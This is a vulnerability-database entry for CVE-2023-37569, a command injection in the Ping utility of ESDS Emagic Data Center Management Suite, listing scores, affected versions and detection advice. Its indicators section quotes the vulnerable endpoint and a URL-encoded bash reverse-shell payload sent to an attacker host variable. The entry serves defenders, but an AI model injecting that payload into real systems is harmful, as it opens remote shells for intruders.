cbcvebase.
CVE-2023-37569
published 2023-08-08

CVE-2023-37569: This vulnerability exists in ESDS Emagic Data Center Management Suit due to lack of input sanitization in its Ping component. A remote authenticated attacker…

PriorityP273high8.8CVSS 3.1
AVNACLPRLUINSUCHIHAH
EXPLOIT
EPSS
24.03%
97.6th percentile
This vulnerability exists in ESDS Emagic Data Center Management Suit due to lack of input sanitization in its Ping component. A remote authenticated attacker could exploit this by injecting OS commands on the targeted system. Successful exploitation of this vulnerability could allow the attacker to execute arbitrary code on targeted system.

Affected

2 ranges
VendorProductVersion rangeFixed in
esds.coemagic_data_center_management<= 6.0
esdsemagic_data_center_management_suite<= V6.0

Detection & IOCsextracted from sources · hover to see the quote

url/index.php/monitor/operations/utilities/
commandbash%20%2Dc%20%27bash%20%2Di%20%3E%26%20%2Fdev%2Ftcp%2F$LHOST%2F$LPORT%200%3E%261%27
version6.0.0
  • Detect POST body parameters where 'utility=ping' and 'hostname' field contains URL-encoded bash reverse shell payloads (e.g., %2Fdev%2Ftcp%2F), indicating exploitation of CVE-2023-37569.
  • Alert on outbound TCP connections from the web server process to unexpected external hosts on arbitrary ports, consistent with a bash reverse shell spawned via /dev/tcp after successful command injection.
  • The exploit targets authenticated sessions; correlate suspicious POST requests to the utilities endpoint with prior successful login events to identify compromised authenticated accounts leveraging this vulnerability.
  • ·Exploitation requires prior authentication; unauthenticated access alone is insufficient to trigger the OS command injection in the Ping component.
  • ·The exploit PoC hardcodes a netcat listener on port 4444 for catching the reverse shell, but the attacker-controlled LPORT is variable; detections should not rely solely on port 4444.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.